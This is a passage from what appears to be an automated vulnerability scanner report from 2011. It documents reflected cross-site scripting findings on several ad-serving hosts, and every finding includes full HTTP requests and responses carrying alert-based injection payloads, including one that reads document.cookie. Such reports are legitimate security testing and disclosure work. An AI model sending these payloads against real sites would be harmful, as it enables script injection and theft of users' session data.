Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313afef5"-alert(1)-"7664da328bf&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1bxx_pain");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

3.18. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.metacafecom/B5470558.8

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3386a'-alert(1)-'2f70b01d2c3 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-69399757845053133386a'-alert(1)-'2f70b01d2c3&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7548

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-69399757845053133386a'-alert(1)-'2f70b01d2c3&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_line \">
...[SNIP]...

3.19. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.metacafecom/B5470558.8

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58695"-alert(1)-"7594321f6a2 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=058695"-alert(1)-"7594321f6a2&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=058695"-alert(1)-"7594321f6a2&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1bxx_pain");
var fscUrl = url;
var fscUrlClickTagFound = false;
va
...[SNIP]...

3.20. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.metacafecom/B5470558.8

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64f52'-alert(1)-'352bb153013 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=064f52'-alert(1)-'352bb153013&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7555

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=064f52'-alert(1)-'352bb153013&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_2bxx_good\">
...[SNIP]...

3.21. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.metacafecom/B5470558.8

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8531a'-alert(1)-'f218f4a84b2 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg8531a'-alert(1)-'f218f4a84b2&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7543

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg8531a'-alert(1)-'f218f4a84b2&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_nbap \">
...[SNIP]...

3.22. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.metacafecom/B5470558.8

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47335"-alert(1)-"dcf5d98505f was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg47335"-alert(1)-"dcf5d98505f&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7543

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg47335"-alert(1)-"dcf5d98505f&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_nbap ");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

3.23. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.metacafecom/B5470558.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7e4e'-alert(1)-'6d5b409016 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=Ld7e4e'-alert(1)-'6d5b409016&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7547

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b09/f/20f/%2a/y%3B240312816%3B0-0%3B0%3B63191625%3B4307-300/250%3B41923894/41941681/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=Ld7e4e'-alert(1)-'6d5b409016&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcw
...[SNIP]...

3.24. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.metacafecom/B5470558.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c14c"-alert(1)-"6086ad86766 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L1c14c"-alert(1)-"6086ad86766&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b09/f/210/%2a/y%3B240312816%3B0-0%3B0%3B63191625%3B4307-300/250%3B41923894/41941681/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L1c14c"-alert(1)-"6086ad86766&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcw
...[SNIP]...

3.25. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31b6f"-alert(1)-"f1e62c14a44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=ad&ad_size=728x90&section=1703625&31b6f"-alert(1)-"f1e62c14a44=1 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; bh="b!!!!m!!Zwa!!!!#=!DU4!!ry1!!!!#=!msQ!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*.a!!!!#=!o!R!#*VS!!!!#=!o!R!#*Xc!!!!#=!07,!#0%H!!!!#=!msS!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#3pS!!!!#=!gBG!#3pv!!!!#=!gBG!#5(U!!!!#=!o!R!#5(W!!!!#=!07,!#5(X!!!!#=!o!R!#5(Y!!!!#=!gBG!#5(_!!!!#=!07,!#5(a!!!!#=!gBG!#5(c!!!!#=!o!R!#5(f!!!!#=!o!R!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#T?O!!!!#=!dO*!#VSs!!!!#=!o!R!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<d!!!!#=!o!R!#b<e!!!!#=!gBG!#b<g!!!!#=!gBG!#b<i!!!!#=!gBG!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#b='!!!!#=!gBG!#b?f!!!!#=!msI!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#x??!!!!'=!nv,!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; uid=uid=c08a423c-7b10-11e0-8d2f-7fbc75b135eb&_hmacv=1&_salt=419862129&_keyid=k1&_hmac=80f2e481993e14f9e9c2e53c8bcda8051c813d3e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:33 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 12:52:33 GMT
Pragma: no-cache
Content-Length: 4324
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?31b6f"-alert(1)-"f1e62c14a44=1&Z=728x90&s=1703625&_salt=3404908760";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

3.26. http://bid.openx.net/json [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bid.openx.net
Path:	/json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload aba86<script>alert(1)</script>c1e227c2a98 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_6670393876aba86<script>alert(1)</script>c1e227c2a98&pid=d6536fd1-a88d-43f5-b56c-d55966e08548&s=728x90&f=0.56&url=http%3A%2F%2Fad.doubleclick.net%2FN6707%2Fadi%2Fmeta.homepage%2FadminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&cid=oxpv1%3A34-632-1929-1558-4408&hrid=b7d3130441279250d437d1e5dbea5016-1305550329 HTTP/1.1
Host: bid.openx.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: i=de6f5b1d-dd7a-4d95-8142-2b91139d25bd; p=1305468134

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=282eed89-72f0-45c6-8111-20529e7e7fdf; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1305550335; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_6670393876aba86<script>alert(1)</script>c1e227c2a98({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAI3PvU7DMBAH8H-TNnXtli4FxMB3JyQjp06MP
